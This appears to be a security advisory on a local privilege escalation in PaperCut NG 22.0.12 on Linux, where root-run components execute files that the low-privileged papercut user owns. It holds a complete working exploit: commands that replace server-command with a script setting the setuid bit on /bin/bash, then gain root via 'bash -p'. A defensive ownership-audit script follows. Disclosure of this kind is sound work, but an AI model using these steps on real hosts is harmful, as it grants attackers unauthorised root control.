We download the latest version 22.0.12 / Build 66453 from the website (pcng-setup-22.0.12.66454.sh) and install it as a low-privileged user called "papercut" on Ubuntu 22.04. During installation we choose the "su" method and provide the root password.
Assume that, as an attacker, we have access to this low-privileged "papercut" user, for example via SSH or another vulnerability, and that we can also reach the web application on port 9191. While logged in as application admin we go to http://127.0.0.1:9191/app?service=page/PrintDeploy and follow the assistant on the right side of the screen until we end up on the "Mobility Print: Import Printers" screen. There we enter anything in the search field and press "Refresh servers". This runs /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
on the machine as root. Because this file lives in a directory owned by the papercut user, we can replace it with any binary or shell script we want.
To execute the attack, run the following commands as the low-privileged "papercut" user:
papercut@research:~$ ls -lah /home/papercut/server/bin/linux-x64/
drwxr-xr-x 3 papercut papercut 4,0K Mai 26 13:03 .
drwx------ 3 papercut papercut 4,0K Mai 26 13:03 ..
...
-rwxr-xr-x 1 papercut papercut 493 Mai 12 08:45 server-command
...
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/sh
#
# (c) Copyright 1999-2013 PaperCut Software International Pty Ltd
#
# A wrapper for server-command
#
. `dirname $0`/.common
export CLASSPATH
${JRE_HOME}/bin/java \
-Djava.io.tmpdir=${TMP_DIR} \
-Dserver.home=${SERVER_HOME} \
-Djava.awt.headless=true \
-Djava.locale.providers=COMPAT,SPI \
-Dlog4j.configurationFile=file:${SERVER_HOME}/lib/log4j2-command.properties \
-Xverify:none \
biz.papercut.pcng.server.ServerCommand \
"$@"
papercut@research:~$ mv /home/papercut/server/bin/linux-x64/server-command /home/papercut/server/bin/linux-x64/server-command.bak
papercut@research:~$ echo "#!/bin/bash" > /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ echo 'chmod u+s /bin/bash' >> /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ chmod +x /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/bash
chmod u+s /bin/bash
The script has now been replaced and will set the setuid bit on bash as soon as we press the refresh button. Note that this is possible only because the file is in our home directory and is owned by the papercut user, yet it is executed as root.
Confirm root privileges:
papercut@research:~$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1,4M Jan 6 2022 /bin/bash
papercut@research:~$ bash -p
bash-5.1# id
uid=1001(papercut) gid=1001(papercut) euid=0(root) groups=1001(papercut)
Besides the example above, there are other, similar issues where binaries in the papercut home folder are executed as root. For example, the Print Deploy service runs another binary as root from the low-privileged user's home folder:
papercut@research:~$ cat /etc/systemd/system/multi-user.target.wants/pc-print-deploy.service
[Unit]
Description=Automatically deploys printers through a server configuration
ConditionFileIsExecutable=/home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
[Service]
StartLimitInterval=5
StartLimitBurst=10
ExecStart=/home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
Restart=always
RestartSec=120
[Install]
WantedBy=multi-user.target
Here the binary can be replaced in the same way as above, but a restart of the service is required to trigger it. Other services are affected as well.
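As an added audit check (not PaperCut's own tooling; the function names and arguments are this example's own), a POSIX sh script that flags the two paths named in this write-up when they, or their parent directory, are owned by someone other than root or are writable by group or others. That ownership is exactly the condition that lets the file be swapped out before a root-run service executes it.

```shell
#!/bin/sh
# Audit helper (added example, not PaperCut's own tooling): checks whether an
# executable that a root-run service launches lives where an unprivileged user
# can replace it. The two paths below are the ones from the write-up; the
# function names and arguments are this example's own.

# check_exec_owner FILE EXPECTED_OWNER
# Returns 0 when FILE and its parent directory are owned by EXPECTED_OWNER and
# neither is group- or world-writable; otherwise prints the reason and returns 1.
check_exec_owner() {
    file=$1
    want=$2
    for p in "$file" "$(dirname "$file")"; do
        [ -e "$p" ] || { echo "MISSING: $p"; return 1; }
        # ls -ld prints "perms links owner group ..."; avoids GNU-only stat flags
        set -- $(ls -ld "$p")
        perms=$1
        owner=$3
        if [ "$owner" != "$want" ]; then
            echo "UNSAFE: $p is owned by $owner, expected $want (user $owner can swap it)"
            return 1
        fi
        # 6th character is the group write bit, 9th the world write bit
        case "$perms" in
            ?????w*)    echo "UNSAFE: $p is group-writable ($perms)"; return 1 ;;
            ????????w*) echo "UNSAFE: $p is world-writable ($perms)"; return 1 ;;
        esac
    done
    echo "OK: $file is owned by $want and not writable by others"
    return 0
}

# Run against the paths named in the write-up: a service running as root
# should only execute files that root owns.
audit_papercut_paths() {
    rc=0
    for f in /home/papercut/server/bin/linux-x64/server-command \
             /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy; do
        check_exec_owner "$f" root || rc=1
    done
    return $rc
}
```

Call audit_papercut_paths on the PaperCut host; a non-zero exit means at least one root-executed path is replaceable by the papercut user and should be moved to a root-owned location or have its ownership fixed.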